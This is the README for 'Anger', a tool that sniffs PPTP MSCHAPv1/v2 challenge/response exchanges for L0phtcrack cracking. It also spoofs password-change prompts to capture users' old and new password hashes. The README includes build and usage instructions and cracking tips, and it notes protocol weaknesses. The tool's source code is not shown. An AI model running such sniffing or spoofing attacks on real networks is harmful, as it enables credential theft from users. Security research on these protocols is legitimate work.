Anger is a PPTP sniffer and attack tool. It sniffs PPTP's MSCHAP
challenge/response and outputs it in a format suitable for input
into the L0phtcrack password cracking program. 

It also implements an active attack against the MSCHAPv1 password
change protocol. If enabled when the program detects a PPTP client 
attempting to logon using MSCHAPv1 it will spoof a password change 
command from the server. If the user then follows the dialogs to
change his password the program will recover the hashes of the current
password and the hashes of the new password the user had selected.
These hashes can be input into L0phtcrack to obtain the password or 
they can be used with a modified PPP client for use with the Linux
PPTP client to logon onto the network.

After the first release of this program Microsoft came up with a new
version of MSCHAP, version 2. The new version is no longer vulnerable
to the password change attack. It also no longer performs a challenge/
response authentication based on the LANMAN hash, and includes
the capability for the client to authenticate the server. 

Microsoft added a number of new steps to the process to generate
a response to a challenge. They use SHA to hash a number of things.
Why they did this is not obvious as it seems to add no security to
the protocol. The hashes can be precomputed by the sniffer and thus
L0phtcrack requires no changes to handle MSCHAPv2.

This version of Anger supports sniffing the MSCHAPv2 challenge/response.
These can also be input into L0phtcrack for cracking. The outlines for
MSCHAPv2 have the LANMAN hash set to all zeros as its not available.
You cannot use the command line version of L0phtcrack (version 1.5) to 
crack MSCHAPv2 entries. This version does not attempt to crack the
NT response via a dictionary attack unless there is also a LANMAN 
response.

You can use the Windows version of L0ptcrack to crack the MSCHAPv2
entries but you must disable the cracking of the LANMAN hash
(only enable the cracking of the NT hash in the options panel).
This is because L0phtcrack does not recognize the all zeros
LANMAN response field as invalid and will attempt to crack it.
Replacing this field with something else results in a parsing
error.

So its recommended that you sort MSCHAPv1 and MSCHAPv2 entries into
different files and crack them separately. If you licensed L0phtcrack
you may wish to suggest to @Stake that they detect when the LANMAN
response is not available for an entry and instead crack the NT response.

To compile the program you require the Pcap and OpenSSL libraries
and header files. To compile use a command line such:

	gcc -o anger anger.c in_cksum.c -lcrypto -lpcap

usage: anger [ -v ] [ -d device ] output1 [ output2 ]

Write sniffed challenge/responses to output1.
If output2 is given it will perform an active attack on
PPTP connections and write the password hashes to output2.

	-d	Device to open for sniffing.
	-v	Some diagnostics.

aleph1@underground.org
